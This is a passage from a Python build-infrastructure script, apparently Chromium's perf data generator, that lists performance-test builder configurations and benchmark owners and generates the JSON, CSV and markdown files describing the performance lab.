'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_trichrome_google',
'isolate': 'resource_sizes_trichrome_google',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_system_webview_bundle',
'isolate': 'resource_sizes_system_webview_bundle',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_system_webview_google_bundle',
'isolate': 'resource_sizes_system_webview_google_bundle',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
],
'dimension': {
'cpu': 'x86',
'os': 'Ubuntu-16.04',
'pool': 'chrome.tests',
},
'perf_trigger':
False,
},
'linux-builder-perf': {
'additional_compile_targets': ['chromedriver', 'chromium_builder_perf'],
'tests': [{
'name': 'chrome_sizes',
'isolate': 'chrome_sizes',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
}],
'dimension': {
'cpu': 'x86-64',
'os': 'Ubuntu-16.04',
'pool': 'chrome.tests',
},
'perf_trigger':
False,
},
'linux-builder-perf-rel': {
'additional_compile_targets': ['chromium_builder_perf'],
},
'mac-builder-perf': {
'additional_compile_targets': ['chromedriver', 'chromium_builder_perf'],
'tests': [{
'name': 'chrome_sizes',
'isolate': 'chrome_sizes',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
}],
'dimension': {
'cpu': 'x86-64',
'os': 'Mac',
'pool': 'chrome.tests',
},
'perf_trigger':
False,
},
'mac-arm-builder-perf': {
'additional_compile_targets': ['chromedriver', 'chromium_builder_perf'],
'tests': [{
'name': 'chrome_sizes',
'isolate': 'chrome_sizes',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
}],
'dimension': {
'cpu': 'x86',
'os': 'Mac',
'pool': 'chrome.tests',
},
'perf_trigger':
False,
},
'win32-builder-perf': {
'additional_compile_targets': ['chromedriver', 'chromium_builder_perf'],
'tests': [{
'name': 'chrome_sizes',
'isolate': 'chrome_sizes',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
}],
'dimension': {
'cpu': 'x86',
'os': 'Windows',
'pool': 'chrome.tests',
},
'perf_trigger':
False,
},
'win64-builder-perf': {
'additional_compile_targets': ['chromedriver', 'chromium_builder_perf'],
'tests': [{
'name': 'chrome_sizes',
'isolate': 'chrome_sizes',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
}],
'dimension': {
'cpu': 'x86-64',
'os': 'Windows',
'pool': 'chrome.tests',
},
'perf_trigger':
False,
},
'android-go-perf': {
'tests': [{
'name': 'performance_test_suite',
'isolate': 'performance_test_suite_android_clank_chrome',
}],
'platform':
'android-chrome',
'dimension': {
'device_os': 'OMB1.180119.001',
'device_type': 'gobo',
'device_os_flavor': 'google',
'pool': 'chrome.tests.perf',
'os': 'Android',
},
},
'android-go_webview-perf': {
'tests': [{
'isolate': 'performance_webview_test_suite',
}],
'platform': 'android-webview-google',
'dimension': {
'pool': 'chrome.tests.perf-webview',
'os': 'Android',
'device_type': 'gobo',
'device_os': 'OMB1.180119.001',
'device_os_flavor': 'google',
},
},
'Android Nexus5 Perf': {
'tests': [
{
'isolate': 'performance_test_suite_android_chrome',
'extra_args': [
'--assert-gpu-compositing',
],
},
],
'platform':
'android',
'dimension': {
'pool': 'chrome.tests.perf',
'os': 'Android',
'device_type': 'hammerhead',
'device_os': 'M4B30Z',
'device_os_flavor': 'google',
},
},
'Android Nexus5X WebView Perf': {
'tests': [{
'isolate': 'performance_webview_test_suite',
'extra_args': [
'--assert-gpu-compositing',
],
}],
'platform':
'android-webview',
'dimension': {
'pool': 'chrome.tests.perf-webview',
'os': 'Android',
'device_type': 'bullhead',
'device_os': 'MOB30K',
'device_os_flavor': 'aosp',
},
},
'android-pixel2_webview-perf': {
'tests': [{
'isolate': 'performance_webview_test_suite',
}],
'platform': 'android-webview-google',
'dimension': {
'pool': 'chrome.tests.perf-webview',
'os': 'Android',
'device_type': 'walleye',
'device_os': 'OPM1.171019.021',
'device_os_flavor': 'google',
},
},
'android-pixel2_weblayer-perf': {
'tests': [{
'isolate': 'performance_weblayer_test_suite',
}],
'platform': 'android-weblayer',
'dimension': {
'pool': 'chrome.tests.perf-weblayer',
'os': 'Android',
'device_type': 'walleye',
'device_os': 'OPM1.171019.021',
'device_os_flavor': 'google',
},
},
'android-pixel2-perf': {
'tests': [{
'isolate':
'performance_test_suite_android_clank_monochrome_64_32_bundle',
}],
'platform':
'android-chrome-64-bundle',
'dimension': {
'pool': 'chrome.tests.perf',
'os': 'Android',
'device_type': 'walleye',
'device_os': 'OPM1.171019.021',
'device_os_flavor': 'google',
},
},
'android-pixel4_webview-perf': {
'tests': [{
'isolate': 'performance_webview_test_suite',
}],
'platform': 'android-webview-trichrome-google-bundle',
'dimension': {
'pool': 'chrome.tests.perf-webview',
'os': 'Android',
'device_type': 'flame',
'device_os': 'R',
'device_os_flavor': 'google',
},
},
'android-pixel4_weblayer-perf': {
'tests': [{
'isolate': 'performance_weblayer_test_suite',
}],
'platform': 'android-weblayer-trichrome-google-bundle',
'dimension': {
'pool': 'chrome.tests.perf-weblayer',
'os': 'Android',
'device_type': 'flame',
'device_os': 'R',
'device_os_flavor': 'google',
},
},
'android-pixel4-perf': {
'tests': [{
'isolate':
'performance_test_suite_android_clank_trichrome_bundle',
}],
'platform':
'android-trichrome-bundle',
'dimension': {
'pool': 'chrome.tests.perf',
'os': 'Android',
'device_type': 'flame',
'device_os': 'R',
'device_os_flavor': 'google',
},
},
'android-pixel4a_power-perf': {
'tests': [{
'isolate': 'performance_test_suite_android_clank_chrome',
'extra_args': [
'--experimental-tbmv3-metrics',
],
}],
'platform':
'android-chrome',
'dimension': {
'pool': 'chrome.tests.pinpoint', # Sharing Pinpoint pool
'os': 'Android',
'device_type': 'sunfish',
'device_os': 'RQ1D.201205.012',
'device_os_flavor': 'google',
},
},
'win-10_laptop_low_end-perf': {
'tests': [
{
'isolate': 'performance_test_suite',
'extra_args': [
'--assert-gpu-compositing',
],
},
],
'platform':
'win',
'target_bits':
64,
'dimension': {
'pool': 'chrome.tests.perf',
# Explicitly set GPU driver version and Windows OS version such
# that we can be informed if this
# version ever changes or becomes inconsistent. It is important
# that bots are homogeneous. See crbug.com/988045 for history.
'os': 'Windows-10-18363.476',
'gpu': '8086:1616-20.19.15.5070',
# TODO(crbug.com/998161): Add synthetic product name for these.
# They don't have this dimension yet as I am writing this CL since
# they are since in pool 'unassigned'.
},
},
'win-10-perf': {
'tests': [
{
'isolate': 'performance_test_suite',
'extra_args': [
'--assert-gpu-compositing',
],
},
],
'platform':
'win',
'target_bits':
64,
'dimension': {
'pool': 'chrome.tests.perf',
# Explicitly set GPU driver version and Windows OS version such
# that we can be informed if this
# version ever changes or becomes inconsistent. It is important
# that bots are homogeneous. See crbug.com/988045 for history.
'os': 'Windows-10-18363.476',
'gpu': '8086:5912-27.20.100.8681',
'synthetic_product_name': 'OptiPlex 7050 (Dell Inc.)'
},
},
'win-10_amd-perf': {
'tests': [
{
'isolate': 'performance_test_suite',
'extra_args': [
'--assert-gpu-compositing',
],
},
],
'platform':
'win',
'target_bits':
64,
'dimension': {
'pool': 'chrome.tests.perf',
# Explicitly set GPU driver version and Windows OS version such
# that we can be informed if this
# version ever changes or becomes inconsistent. It is important
# that bots are homogeneous. See crbug.com/988045 for history.
'os': 'Windows-10-18363.476',
'gpu': '1002:15d8-27.20.1034.6',
'synthetic_product_name': '11A5S4L300 [ThinkCentre M75q-1] (LENOVO)'
},
},
'win-10_amd_laptop-perf': {
'tests': [
{
'isolate': 'performance_test_suite',
'extra_args': [
'--assert-gpu-compositing',
],
},
],
'platform':
'win',
'target_bits':
64,
'dimension': {
'pool': 'chrome.tests.perf',
# Explicitly set GPU driver version and Windows OS version such
# that we can be informed if this
# version ever changes or becomes inconsistent. It is important
# that bots are homogeneous. See crbug.com/988045 for history.
'os': 'Windows-10-19043.1052',
'gpu': '1002:1638-10.0.19041.868',
'synthetic_product_name': 'OMEN by HP Laptop 16-c0xxx [ ] (HP)',
},
},
'Win 7 Perf': {
'tests': [
{
'isolate': 'performance_test_suite',
},
],
'platform': 'win',
'target_bits': 32,
'dimension': {
'gpu': '102b:0532-6.1.7600.16385',
'os': 'Windows-2008ServerR2-SP1',
'pool': 'chrome.tests.perf',
'synthetic_product_name': 'PowerEdge R210 II (Dell Inc.)',
},
},
'Win 7 Nvidia GPU Perf': {
'tests': [
{
'isolate': 'performance_test_suite',
'extra_args': [
'--assert-gpu-compositing',
],
},
],
'platform':
'win',
'target_bits':
64,
'dimension': {
'gpu': '10de:1cb3-23.21.13.8792',
'os': 'Windows-2008ServerR2-SP1',
'pool': 'chrome.tests.perf',
'synthetic_product_name': 'PowerEdge R220 [01] (Dell Inc.)'
},
},
'mac-10_12_laptop_low_end-perf': {
'tests': [
{
'isolate': 'performance_test_suite',
'extra_args': [
'--assert-gpu-compositing',
],
},
],
'platform':
'mac',
'dimension': {
'cpu':
'x86-64',
'gpu':
'8086:1626',
'os':
'Mac-10.12.6',
'pool':
'chrome.tests.perf',
'synthetic_product_name':
'MacBookAir7,2_x86-64-i5-5350U_Intel Broadwell HD Graphics 6000_8192_APPLE SSD SM0128G'
},
},
'mac-m1_mini_2020-perf': {
'tests': [
{
'isolate': 'performance_test_suite',
'extra_args': [
'--assert-gpu-compositing',
],
},
],
'platform':
'mac',
'dimension': {
'cpu': 'arm',
'mac_model': 'Macmini9,1',
'os': 'Mac',
'pool': 'chrome.tests.perf',
},
},
'linux-perf': {
'tests': [
{
'isolate': 'performance_test_suite',
'extra_args': [
'--assert-gpu-compositing',
],
},
],
'platform':
'linux',
'dimension': {
'gpu': '10de:1cb3-440.100',
'os': 'Ubuntu-18.04',
'pool': 'chrome.tests.perf',
'synthetic_product_name': 'PowerEdge R230 (Dell Inc.)'
},
},
'linux-perf-rel': {
'tests': [
{
'isolate': 'performance_test_suite',
'extra_args': [
'--assert-gpu-compositing',
],
},
],
'platform':
'linux',
'dimension': {
'gpu': '10de:1cb3-440.100',
'os': 'Ubuntu-18.04',
'pool': 'chrome.tests.perf',
'synthetic_product_name': 'PowerEdge R230 (Dell Inc.)'
},
},
'mac-10_13_laptop_high_end-perf': {
'tests': [
{
'isolate': 'performance_test_suite',
'extra_args': [
'--assert-gpu-compositing',
],
},
],
'platform':
'mac',
'dimension': {
'cpu':
'x86-64',
'gpu':
'1002:6821-4.0.20-3.2.8',
'os':
'Mac-10.13.3',
'pool':
'chrome.tests.perf',
'synthetic_product_name':
'MacBookPro11,5_x86-64-i7-4870HQ_AMD Radeon R8 M370X 4.0.20 [3.2.8]_Intel Haswell Iris Pro Graphics 5200 4.0.20 [3.2.8]_16384_APPLE SSD SM0512G',
},
},
'linux-processor-perf': {
'platform': 'linux',
'perf_processor': True,
},
'android-go-processor-perf': {
'platform': 'linux',
'perf_processor': True,
},
'android-pixel2-processor-perf': {
'platform': 'linux',
'perf_processor': True,
},
'android-pixel2_webview-processor-perf': {
'platform': 'linux',
'perf_processor': True,
},
'win-10-processor-perf': {
'platform': 'linux',
'perf_processor': True,
},
'win-10_laptop_low_end-processor-perf': {
'platform': 'linux',
'perf_processor': True,
},
'mac-10_12_laptop_low_end-processor-perf': {
'platform': 'linux',
'perf_processor': True,
},
'mac-10_13_laptop_high_end-processor-perf': {
'platform': 'linux',
'perf_processor': True,
},
'chromecast-linux-builder-perf': {
'additional_compile_targets': ['cast_shell'],
'tests': [
{
'name': 'resource_sizes_chromecast',
'isolate': 'resource_sizes_chromecast',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
],
'dimension': {
'cpu': 'x86-64',
'os': 'Ubuntu-16.04',
'pool': 'chrome.tests',
},
'perf_trigger':
False,
},
'chromeos-amd64-generic-lacros-builder-perf': {
'additional_compile_targets': ['chrome'],
'tests': [
{
'name': 'resource_sizes_lacros_chrome',
'isolate': 'resource_sizes_lacros_chrome',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
],
'dimension': {
'cpu': 'x86-64',
'os': 'Ubuntu-16.04',
'pool': 'chrome.tests',
},
'perf_trigger':
False,
},
'lacros-eve-perf': {
'tests': [
{
'isolate':
'performance_test_suite_eve',
'extra_args': [
# The magic hostname that resolves to a CrOS device in the test lab
'--remote=variable_chromeos_device_hostname',
],
},
],
'platform':
'lacros',
'target_bits':
64,
'dimension': {
'pool': 'chrome.tests.perf',
# TODO(crbug.com/971204): Explicitly set the gpu to None to make
# chromium_swarming recipe_module ignore this dimension.
'gpu': None,
'os': 'ChromeOS',
'device_status': 'available',
'device_type': 'eve',
},
},
}
# pylint: enable=line-too-long
_TESTER_SERVICE_ACCOUNT = (
'chrome-tester@chops-service-accounts.iam.gserviceaccount.com')
def update_all_builders(file_path):
return (_update_builders(BUILDERS, file_path) and
is_perf_benchmarks_scheduling_valid(file_path, sys.stderr))
def update_all_fyi_builders(file_path):
return _update_builders(FYI_BUILDERS, file_path)
def update_all_calibration_builders(file_path):
return _update_builders(CALIBRATION_BUILDERS, file_path)
def _update_builders(builders_dict, file_path):
tests = {}
tests['AAAAA1 AUTOGENERATED FILE DO NOT EDIT'] = {}
tests['AAAAA2 See //tools/perf/generate_perf_data to make changes'] = {}
for name, config in builders_dict.items():
tests[name] = generate_builder_config(config, name)
with open(file_path, 'w') as fp:
json.dump(tests, fp, indent=2, separators=(',', ': '), sort_keys=True)
fp.write('\n')
return True
def merge_dicts(*dict_args):
result = {}
for dictionary in dict_args:
result.update(dictionary)
return result
class BenchmarkMetadata(object):
def __init__(self, emails, component='', documentation_url='', stories=None):
"""An object to hold information about a benchmark.
Args:
emails: A string with a comma separated list of owner emails.
component: An optional string with a component for filing bugs about this
benchmark.
documentation_url: An optional string with a URL where documentation
about the benchmark can be found.
stories: An optional list of benchmark_utils.StoryInfo tuples with
information about stories contained in this benchmark.
"""
self.emails = emails
self.component = component
self.documentation_url = documentation_url
if stories is not None:
assert isinstance(stories, list)
self.stories = stories
else:
self.stories = []
@property
def tags(self):
"""Return a comma separated list of all tags used by benchmark stories."""
return ','.join(sorted(set().union(*(s.tags for s in self.stories))))
GTEST_BENCHMARKS = {
'base_perftests':
BenchmarkMetadata(
'skyostil@chromium.org, gab@chromium.org', 'Internals>SequenceManager',
('https://chromium.googlesource.com/chromium/src/+/HEAD/base/' +
'README.md#performance-testing')),
'gpu_perftests':
BenchmarkMetadata(
'reveman@chromium.org, chrome-gpu-perf-owners@chromium.org',
'Internals>GPU'),
'tracing_perftests':
BenchmarkMetadata('eseckler@chromium.org, oysteine@chromium.org',
'Speed>Tracing'),
'load_library_perf_tests':
BenchmarkMetadata('xhwang@chromium.org, jrummell@chromium.org',
'Internals>Media>Encrypted'),
'performance_browser_tests':
BenchmarkMetadata('johnchen@chromium.org, jophba@chromium.org',
'Internals>Media>ScreenCapture'),
'views_perftests':
BenchmarkMetadata('tapted@chromium.org', 'Internals>Views'),
'components_perftests':
BenchmarkMetadata('csharrison@chromium.org'),
'dawn_perf_tests':
BenchmarkMetadata(
'enga@chromium.org, chrome-gpu-perf-owners@chromium.org',
'Internals>GPU>Dawn',
'https://dawn.googlesource.com/dawn/+/HEAD/src/tests/perf_tests/README.md'
),
}
RESOURCE_SIZES_METADATA = BenchmarkMetadata(
'agrieve@chromium.org, jbudorick@chromium.org',
'Build',
('https://chromium.googlesource.com/chromium/src/+/HEAD/'
'tools/binary_size/README.md#resource_sizes_py'))
OTHER_BENCHMARKS = {
'resource_sizes_chrome_modern_minimal_apks': RESOURCE_SIZES_METADATA,
'resource_sizes_chrome_modern_public_minimal_apks': RESOURCE_SIZES_METADATA,
'resource_sizes_monochrome_minimal_apks': RESOURCE_SIZES_METADATA,
'resource_sizes_monochrome_public_minimal_apks': RESOURCE_SIZES_METADATA,
'resource_sizes_trichrome': RESOURCE_SIZES_METADATA,
'resource_sizes_trichrome_google': RESOURCE_SIZES_METADATA,
'resource_sizes_system_webview_bundle': RESOURCE_SIZES_METADATA,
'resource_sizes_system_webview_google_bundle': RESOURCE_SIZES_METADATA,
}
OTHER_BENCHMARKS.update({
'chrome_sizes':
BenchmarkMetadata(
emails='heiserya@chromium.org, johnchen@chromium.org',
component='Build',
documentation_url=(
'https://chromium.googlesource.com/chromium/'
'src/+/HEAD/tools/binary_size/README.md#resource_sizes_py'),
),
})
OTHER_BENCHMARKS.update({
'resource_sizes_chromecast':
BenchmarkMetadata(
emails='juke@chromium.org, eliribble@chromium.org',
component='Chromecast',
documentation_url=(
'https://chromium.googlesource.com/chromium/'
'src/+/HEAD/tools/binary_size/README.md#resource_sizes_py'),
),
})
OTHER_BENCHMARKS.update({
'resource_sizes_lacros_chrome':
BenchmarkMetadata(
emails='erikchen@chromium.org, huangs@chromium.org',
component='OS>LaCrOS',
documentation_url=(
'https://chromium.googlesource.com/chromium/'
'src/+/HEAD/tools/binary_size/README.md#resource_sizes_py'),
),
})
SYSTEM_HEALTH_BENCHMARKS = set([
'system_health.common_desktop',
'system_health.common_mobile',
'system_health.memory_desktop',
'system_health.memory_mobile',
])
# Valid test suite (benchmark) names should match this regex.
RE_VALID_TEST_SUITE_NAME = r'^[\w._-]+$'
def _get_telemetry_perf_benchmarks_metadata():
metadata = {}
for benchmark in benchmark_finders.GetOfficialBenchmarks():
benchmark_name = benchmark.Name()
emails = decorators.GetEmails(benchmark)
if emails:
emails = ', '.join(emails)
metadata[benchmark_name] = BenchmarkMetadata(
emails=emails,
component=decorators.GetComponent(benchmark),
documentation_url=decorators.GetDocumentationLink(benchmark),
stories=benchmark_utils.GetBenchmarkStoryInfo(benchmark()))
return metadata
TELEMETRY_PERF_BENCHMARKS = _get_telemetry_perf_benchmarks_metadata()
PERFORMANCE_TEST_SUITES = [
'performance_test_suite',
'performance_test_suite_eve',
'performance_webview_test_suite',
'performance_weblayer_test_suite',
]
for suffix in android_browser_types.TELEMETRY_ANDROID_BROWSER_TARGET_SUFFIXES:
PERFORMANCE_TEST_SUITES.append('performance_test_suite' + suffix)
def get_scheduled_non_telemetry_benchmarks(perf_waterfall_file):
test_names = set()
with open(perf_waterfall_file) as f:
tests_by_builder = json.load(f)
script_tests = []
for tests in tests_by_builder.values():
if 'isolated_scripts' in tests:
script_tests += tests['isolated_scripts']
if 'scripts' in tests:
script_tests += tests['scripts']
for s in script_tests:
name = s['name']
# TODO(eyaich): Determine new way to generate ownership based
# on the benchmark bot map instead of on the generated tests
# for new perf recipe.
if not name in PERFORMANCE_TEST_SUITES:
test_names.add(name)
for platform in bot_platforms.ALL_PLATFORMS:
for executable in platform.executables:
test_names.add(executable.name)
return test_names
def is_perf_benchmarks_scheduling_valid(
perf_waterfall_file, outstream):
"""Validates that all existing benchmarks are properly scheduled.
Return: True if all benchmarks are properly scheduled, False otherwise.
"""
scheduled_non_telemetry_tests = get_scheduled_non_telemetry_benchmarks(
perf_waterfall_file)
all_perf_gtests = set(GTEST_BENCHMARKS)
all_perf_other_tests = set(OTHER_BENCHMARKS)
error_messages = []
for test_name in all_perf_gtests - scheduled_non_telemetry_tests:
error_messages.append(
'Benchmark %s is tracked but not scheduled on any perf waterfall '
'builders. Either schedule or remove it from GTEST_BENCHMARKS.'
% test_name)
for test_name in all_perf_other_tests - scheduled_non_telemetry_tests:
error_messages.append(
'Benchmark %s is tracked but not scheduled on any perf waterfall '
'builders. Either schedule or remove it from OTHER_BENCHMARKS.'
% test_name)
for test_name in scheduled_non_telemetry_tests.difference(
all_perf_gtests, all_perf_other_tests):
error_messages.append(
'Benchmark %s is scheduled on perf waterfall but not tracked. Please '
'add an entry for it in GTEST_BENCHMARKS or OTHER_BENCHMARKS in'
'//tools/perf/core/perf_data_generator.py.' % test_name)
for message in error_messages:
print('*', textwrap.fill(message, 70), '\n', file=outstream)
return not error_messages
# Verify that all benchmarks have owners except those on the whitelist.
def _verify_benchmark_owners(benchmark_metadatas):
unowned_benchmarks = set()
for benchmark_name in benchmark_metadatas:
if benchmark_metadatas[benchmark_name].emails is None:
unowned_benchmarks.add(benchmark_name)
assert not unowned_benchmarks, (
'All benchmarks must have owners. Please add owners for the following '
'benchmarks:\n%s' % '\n'.join(unowned_benchmarks))
# Open a CSV file for writing, handling the differences between Python 2 and 3.
def _create_csv(file_path):
if sys.version_info.major == 2:
return open(file_path, 'wb')
else:
return open(file_path, 'w', newline='')
def update_benchmark_csv(file_path):
"""Updates go/chrome-benchmarks.
Updates telemetry/perf/benchmark.csv containing the current benchmark names,
owners, and components. Requires that all benchmarks have owners.
"""
header_data = [
['AUTOGENERATED FILE DO NOT EDIT'],
[
'See the following link for directions for making changes ' +
'to this data:', 'https://bit.ly/update-benchmarks-info'
],
[
'Googlers can view additional information about internal perf ' +
'infrastructure at',
'https://goto.google.com/chrome-benchmarking-sheet'
],
[
'Benchmark name', 'Individual owners', 'Component', 'Documentation',
'Tags'
]
]
csv_data = []
benchmark_metadatas = merge_dicts(
GTEST_BENCHMARKS, OTHER_BENCHMARKS, TELEMETRY_PERF_BENCHMARKS)
_verify_benchmark_owners(benchmark_metadatas)
undocumented_benchmarks = set()
for benchmark_name in benchmark_metadatas:
if not re.match(RE_VALID_TEST_SUITE_NAME, benchmark_name):
raise ValueError('Invalid benchmark name: %s' % benchmark_name)
if not benchmark_metadatas[benchmark_name].documentation_url:
undocumented_benchmarks.add(benchmark_name)
csv_data.append([
benchmark_name,
benchmark_metadatas[benchmark_name].emails,
benchmark_metadatas[benchmark_name].component,
benchmark_metadatas[benchmark_name].documentation_url,
benchmark_metadatas[benchmark_name].tags,
])
if undocumented_benchmarks != ub_module.UNDOCUMENTED_BENCHMARKS:
error_message = (
'The list of known undocumented benchmarks does not reflect the actual '
'ones.\n')
if undocumented_benchmarks - ub_module.UNDOCUMENTED_BENCHMARKS:
error_message += (
'New undocumented benchmarks found. Please document them before '
'enabling on perf waterfall: %s' % (
','.join(b for b in undocumented_benchmarks -
ub_module.UNDOCUMENTED_BENCHMARKS)))
if ub_module.UNDOCUMENTED_BENCHMARKS - undocumented_benchmarks:
error_message += (
'These benchmarks are already documented. Please remove them from '
'the UNDOCUMENTED_BENCHMARKS list in undocumented_benchmarks.py: %s' %
(','.join(b for b in ub_module.UNDOCUMENTED_BENCHMARKS -
undocumented_benchmarks)))
raise ValueError(error_message)
csv_data = sorted(csv_data, key=lambda b: b[0])
csv_data = header_data + csv_data
with _create_csv(file_path) as f:
writer = csv.writer(f, lineterminator='\n')
writer.writerows(csv_data)
return True
def update_system_health_stories(filepath):
"""Updates bit.ly/csh-stories.
Updates tools/perf/system_health_stories.csv containing the current set
of system health stories.
"""
header_data = [['AUTOGENERATED FILE DO NOT EDIT'],
['See //tools/perf/core/perf_data_generator.py to make changes'],
['Story', 'Description', 'Platforms', 'Tags']
]
stories = {}
for benchmark_name in sorted(SYSTEM_HEALTH_BENCHMARKS):
platform = benchmark_name.rsplit('_', 1)[-1]
for story in TELEMETRY_PERF_BENCHMARKS[benchmark_name].stories:
if story.name not in stories:
stories[story.name] = {
'description': story.description,
'platforms': set([platform]),
'tags': set(story.tags)
}
else:
stories[story.name]['platforms'].add(platform)
stories[story.name]['tags'].update(story.tags)
with _create_csv(filepath) as f:
writer = csv.writer(f, lineterminator='\n')
for row in header_data:
writer.writerow(row)
for story_name, info in sorted(stories.items()):
platforms = ','.join(sorted(info['platforms']))
tags = ','.join(sorted(info['tags']))
writer.writerow([story_name, info['description'], platforms, tags])
return True
def update_labs_docs_md(filepath):
configs = collections.defaultdict(list)
for tester in bot_platforms.ALL_PLATFORMS:
if not tester.is_fyi:
configs[tester.platform].append(tester)
with open(filepath, 'w') as f:
f.write("""
[comment]: # (AUTOGENERATED FILE DO NOT EDIT)
[comment]: # (See //tools/perf/generate_perf_data to make changes)
# Platforms tested in the Performance Lab
""")
for platform, testers in sorted(configs.items()):
f.write('## %s\n\n' % platform.title())
testers.sort()
for tester in testers:
f.write(' * [{0.name}]({0.builder_url}): {0.description}.\n'.format(
tester))
f.write('\n')
return True
def generate_telemetry_args(tester_config, platform):
# First determine the browser that you need based on the tester
browser_name = ''
# For trybot testing we always use the reference build
if tester_config.get('testing', False):
browser_name = 'reference'
elif 'browser' in tester_config:
browser_name = 'exact'
elif tester_config['platform'] == 'android':
browser_name = 'android-chromium'
elif tester_config['platform'].startswith('android-'):
browser_name = tester_config['platform']
elif tester_config['platform'] == 'chromeos':
browser_name = 'cros-chrome'
elif tester_config['platform'] == 'lacros':
browser_name = 'lacros-chrome'
elif (tester_config['platform'] == 'win'
and tester_config['target_bits'] == 64):
browser_name = 'release_x64'
elif tester_config['platform'] == 'fuchsia':
browser_name = 'web-engine-shell'
else:
browser_name ='release'
test_args = [
'-v',
'--browser=%s' % browser_name,
'--upload-results',
'--test-shard-map-filename=%s' % platform.shards_map_file_name,
]
if platform.run_reference_build:
test_args.append('--run-ref-build')
if 'browser' in tester_config:
test_args.append('--browser-executable=../../out/Release/%s' %
tester_config['browser'])
if tester_config['platform'].startswith('android'):
test_args.append('--device=android')
return test_args
def generate_gtest_args(test_name):
# --gtest-benchmark-name so the benchmark name is consistent with the test
# step's name. This is not always the same as the test binary's name (see
# crbug.com/870692).
return [
'--gtest-benchmark-name', test_name,
]
def generate_performance_test(tester_config, test, builder_name):
isolate_name = test['isolate']
test_name = test.get('name', isolate_name)
test_type = test.get('type', TEST_TYPES.TELEMETRY)
assert test_type in TEST_TYPES.ALL
shards = test.get('num_shards', None)
test_args = []
if test_type == TEST_TYPES.TELEMETRY:
platform = bot_platforms.PLATFORMS_BY_NAME[builder_name]
test_args += generate_telemetry_args(tester_config, platform)
assert shards is None
shards = platform.num_shards
elif test_type == TEST_TYPES.GTEST:
test_args += generate_gtest_args(test_name=test_name)
assert shards
# Append any additional args specific to an isolate
test_args += test.get('extra_args', [])
result = {
'args': test_args,
'isolate_name': isolate_name,
'name': test_name,
'override_compile_targets': [
isolate_name
]
}
if test.get('resultdb'):
result['resultdb'] = test['resultdb'].copy()
elif 'builder-perf' not in builder_name:
# Enable Result DB on all perf test bots. Builders with names including
# "builder-perf" are used for compiling only, and do not run perf tests.
# TODO(crbug.com/1135718): Replace the following line by specifying either
# "result_format" for GTests, or "has_native_resultdb_integration" for all
# other tests.
result['resultdb'] = {'enable': True}
# For now we either get shards from the number of devices specified
# or a test entry needs to specify the num shards if it supports
# soft device affinity.
if tester_config.get('perf_trigger', True):
result['trigger_script'] = {
'requires_simultaneous_shard_dispatch': True,
'script': '//testing/trigger_scripts/perf_device_trigger.py',
'args': [
'--multiple-dimension-script-verbose',
'True'
],
}
if builder_name in DYNAMIC_SHARDING_TESTERS:
result['trigger_script']['args'].append('--use-dynamic-shards')
result['merge'] = {
'script': '//tools/perf/process_perf_results.py',
}
if builder_name in LIGHTWEIGHT_TESTERS:
result['merge']['args'] = ['--lightweight', '--skip-perf']
result['swarming'] = {
# Always say this is true regardless of whether the tester
# supports swarming. It doesn't hurt.
'can_use_on_swarming_builders': True,
'expiration': 2 * 60 * 60, # 2 hours pending max
# TODO(crbug.com/865538): once we have plenty of windows hardwares,
# to shards perf benchmarks on Win builders, reduce this hard timeout
# limit to ~2 hrs.
# Note that the builder seems to time out after 7 hours
# (crbug.com/1036447), so we must timeout the shards within ~6 hours to
# allow for other overhead. If the overall builder times out then we
# don't get data even from the passing shards.
'hard_timeout': int(6 * 60 * 60), # 6 hours timeout for full suite
'ignore_task_failure': False,
# 5.5 hour timeout. Note that this is effectively the timeout for a
# benchmarking subprocess to run since we intentionally do not stream
# subprocess output to the task stdout.
# TODO(crbug.com/865538): Reduce this once we can reduce hard_timeout.
'io_timeout': int(6 * 60 * 60),
'dimension_sets': [tester_config['dimension']],
'service_account': _TESTER_SERVICE_ACCOUNT,
}
if shards:
result['swarming']['shards'] = shards
return result
def generate_builder_config(condensed_config, builder_name):
config = {}
if 'additional_compile_targets' in condensed_config:
config['additional_compile_targets'] = (
condensed_config['additional_compile_targets'])
# TODO(crbug.com/1078675): remove this setting
if 'perf_processor' in condensed_config:
config['merge'] = {
'script': '//tools/perf/process_perf_results.py',
}
config['merge']['args'] = ['--lightweight']
condensed_tests = condensed_config.get('tests')
if condensed_tests:
gtest_tests = []
telemetry_tests = []
other_tests = []
for test in condensed_tests:
generated_script = generate_performance_test(
condensed_config, test, builder_name)
test_type = test.get('type', TEST_TYPES.TELEMETRY)
if test_type == TEST_TYPES.GTEST:
gtest_tests.append(generated_script)
elif test_type == TEST_TYPES.TELEMETRY:
telemetry_tests.append(generated_script)
elif test_type == TEST_TYPES.GENERIC:
other_tests.append(generated_script)
else:
raise ValueError(
'perf_data_generator.py does not understand test type %s.'
% test_type)
gtest_tests.sort(key=lambda x: x['name'])
telemetry_tests.sort(key=lambda x: x['name'])
other_tests.sort(key=lambda x: x['name'])
# Put Telemetry tests as the end since they tend to run longer to avoid
# starving gtests (see crbug.com/873389).
config['isolated_scripts'] = gtest_tests + telemetry_tests + other_tests
return config
# List of all updater functions and the file they generate. The updater
# functions must return True on success and False otherwise. File paths are
# relative to chromium src and should use posix path separators (i.e. '/').
ALL_UPDATERS_AND_FILES = [
(update_all_builders, 'testing/buildbot/chromium.perf.json'),
(update_all_fyi_builders, 'testing/buildbot/chromium.perf.fyi.json'),
(update_all_calibration_builders,
'testing/buildbot/chromium.perf.calibration.json'),
(update_benchmark_csv, 'tools/perf/benchmark.csv'),
(update_system_health_stories, 'tools/perf/system_health_stories.csv'),
